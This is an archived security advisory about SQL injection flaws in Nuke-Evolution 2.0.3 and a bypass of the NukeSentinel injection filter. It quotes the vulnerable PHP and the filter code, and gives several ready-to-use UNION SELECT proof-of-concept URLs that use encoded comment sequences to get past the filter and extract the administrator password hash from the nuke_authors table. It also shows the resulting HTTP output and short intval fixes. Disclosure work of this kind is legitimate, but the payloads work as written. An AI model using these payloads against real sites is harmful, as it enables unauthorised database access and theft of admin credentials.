AOH :: HP Unsorted N :: TB10478.HTM

NukeSentinel Bypass SQL Injection & Nuke Evolution <= 2.0.3 SQL Injections



NukeSentinel Bypass SQL Injection & Nuke Evolution <= 2.0.3 SQL Injections
NukeSentinel Bypass SQL Injection & Nuke Evolution <= 2.0.3 SQL Injections



PROGRAM: Nuke-Evolution & NukeSentinel
HOMEPAGE: http://www.nuke-evolution.com/ 
VERSION: All versions
BUG 1 NukeSentinel Bypass SQL Injection Protection
BUG 2 Nuke Evolution <= 2.0.3 SQL Injections vulnerabilities
AUTHOR: Aleksandar

NukeSentinel Bypass SQL Injection Protection

nukesentinel.php Line 270-290

******************************************
// Check for UNION attack
// Copyright 2004(c) Raven PHP Scripts
$blocker_row = $blocker_array[1];
if($blocker_row['activate'] > 0) {
  if (stristr($nsnst_const['query_string'],'+union+') OR stristr($nsnst_const['query_string'],'%20union%20') OR stristr($nsnst_const['query_string'],'*/union/*') OR stristr($nsnst_const['query_string'],' union ') OR stristr($nsnst_const['query_string_base64'],'+union+') OR stristr($nsnst_const['query_string_base64'],'%20union%20') OR stristr($nsnst_const['query_string_base64'],'*/union/*') OR stristr($nsnst_const['query_string_base64'],' union ')) {
   // block_ip($blocker_row);
   die("BLOCK IP 1 " );
  }
}

// Check for CLIKE attack
// Copyright 2004(c) Raven PHP Scripts
$blocker_row = $blocker_array[2];
if($blocker_row['activate'] > 0) {
  if (
  stristr($nsnst_const['query_string'],'/*') OR 
  stristr($nsnst_const['query_string_base64'],'/*') OR 
  stristr($nsnst_const['query_string'],'*/') OR 
  stristr($nsnst_const['query_string_base64'],'*/')) {
  //  block_ip($blocker_row);
    die("BLOCK IP 2 " );
  } 
}


******************************************

Example(Bypass SQL Injection Protection):

PHPNuke + NukeSentinel
http://localhost/php-nuke/?%2f**%2fUNION%2f**%2fSELECT ... etc 

Nuke-Evolution + NukeSentinel
http://localhost/nuke-evolution/?%2f**%2fUNION%2f**%2fSELECT .. etc 



Nuke-Evolution Basic 2.0.3

Open source content management system, which features customizable blocks, modules, multilanguage support and themes. With importance on security, speed and usability.
A PHP-Nuke based CMS with added security, functionality, and core improvements. 

Site:http://www.nuke-evolution.com/ 

 

Your_Account/index.php

Vulnerability code:
********************************************************************
    case "userinfo":
        //include("modules/$module_name/public/userinfo.php");
/*****[BEGIN]******************************************
 [ Mod:    YA Merge                            v1.0.0 ]
 ******************************************************/
                            //The "$username" variable isn't filtered!!!
 		$result  = $db->sql_query("SELECT user_id FROM ".$user_prefix."_users WHERE username='$username'

"); $uid = $db->sql_fetchrow($result); Header("Location: modules.php?name=Profile&mode=viewprofile&u=".$uid[0]); die(); /*****[END]******************************************** [ Mod: YA Merge v1.0.0 ] ******************************************************/ break; ********************************************************************* POC Exploit: http://localhost/nukeNE/modules.php?name=Your_Account&op=userinfo&username=1'%2f**%2fUNION%2f**%2fSELECT%20pwd%20FROM%20nuke_authors%20WHERE%20%20radminsuper='1'%2f** Results: MOZILA FIREFOX URL BAR/ADDRESS BAR: http://localhost/nukeNE/modules.php?name=Profile&mode=viewprofile&u=ADMIN-MD5-HASH MOZILA FIREFOX Live HTTP Headers - Firefox Add-ons http://localhost/nukeNE/modules.php?name=Profile&mode=viewprofile&u=ADMIN-MD5-HASH GET /nukeNE/modules.php?name=Profile&mode=viewprofile&u=ADMIN-MD5-HASH HTTP/1.1 Host: localhost:8080 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate News/read_article.php line 66 Vulnerability code: ++++++++++++++++++++++++++++++++++ // //The "'$sid" variable isn't filtered!!! $sql = "select catid, aid, time, title, hometext, bodytext, topic, informant, notes, acomm, haspoll, pollID, score, ratings FROM ".$prefix."_stories where sid='$sid'"; $result = $db->sql_query($sql); ++++++++++++++++++++++++++++++++++ POC Exploit: http://localhost:8080/htmlNE/modules.php?name=News&file=read_article&sid=-1'%2f**%2fUNION%2f**%2fSELECT%201,1,1,pwd,1,1,1,1,1,1,1,1,1,1%20FROM%20nuke_authors%20WHERE%20radminsuper='1'%2f** FIX ++++++++++++++++++++++++++++++++++ $sid= intval($sid); // FIX $sql = "select catid, aid, time, title, hometext, bodytext, topic, informant, notes, acomm, haspoll, pollID, score, ratings FROM ".$prefix."_stories where sid='$sid'"; $result = $db->sql_query($sql); ++++++++++++++++++++++++++++++++++ Donate/index.php line 33 & 46 Vulnerability code: ******************************************************** if (is_numeric($uid)) { // LOL :) $uid = intval($uid); :) LOL } .... // Line 46 } elseif (!empty($uid)) { include_once(NUKE_BASE_DIR.'header.php'); $sql = "SELECT username FROM ".$user_prefix."_users where user_id='$uid'"; // BOOM - > SQL injection $result = $db->sql_query($sql); $row = $db->sql_fetchrow($result); $name = $row['username']; ********************************************************** POC Exploit: http://localhost:8080/htmlNE/modules.php?name=Donate&op=received&uid=-1'%2f**%2fUNION%2f**%2fSELECT%20pwd%20FROM%20nuke_authors%20WHERE%20%20radminsuper='1 FIX ++++++++++++++++++++++++++++++++++++++ ///if (is_numeric($uid)) { REMOVE THIS LINE $uid = intval($uid); ///} REMOVE THIS LINE ++++++++++++++++++++++++++++++++++++++ Best Regards Aleksandar Programmer and Web Developer

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.